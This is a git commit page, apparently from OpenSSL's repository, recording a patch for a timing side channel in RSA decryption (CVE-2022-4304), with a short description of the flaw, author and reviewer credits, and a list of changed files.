Fix Timing Oracle in RSA decryption
authorDmitry Belyavskiy <beldmit@gmail.com>
Fri, 20 Jan 2023 15:03:40 +0000 (15:03 +0000)
committerTomas Mraz <tomas@openssl.org>
Fri, 3 Feb 2023 11:38:22 +0000 (12:38 +0100)
commit8e257b86e5812c6e1cfa9e8e5f5660ac7bed899d
tree24b77097378730b287a820584800bc292d4061b8
parentfe6842f5a5dc2fb66da7fb24bf4343a3aeedd50a
Fix Timing Oracle in RSA decryption

A timing based side channel exists in the OpenSSL RSA Decryption
implementation which could be sufficient to recover a plaintext across
a network in a Bleichenbacher style attack. To achieve a successful
decryption an attacker would have to be able to send a very large number
of trial messages for decryption. The vulnerability affects all RSA
padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE.

Patch written by Dmitry Belyavsky and Hubert Kario

CVE-2022-4304

Reviewed-by: Matt Caswell <matt@openssl.org>
Reviewed-by: Tomas Mraz <tomas@openssl.org>
crypto/bn/bn_blind.c
crypto/bn/bn_local.h
crypto/bn/build.info
crypto/bn/rsa_sup_mul.c [new file with mode: 0644]
crypto/rsa/rsa_ossl.c
include/crypto/bn.h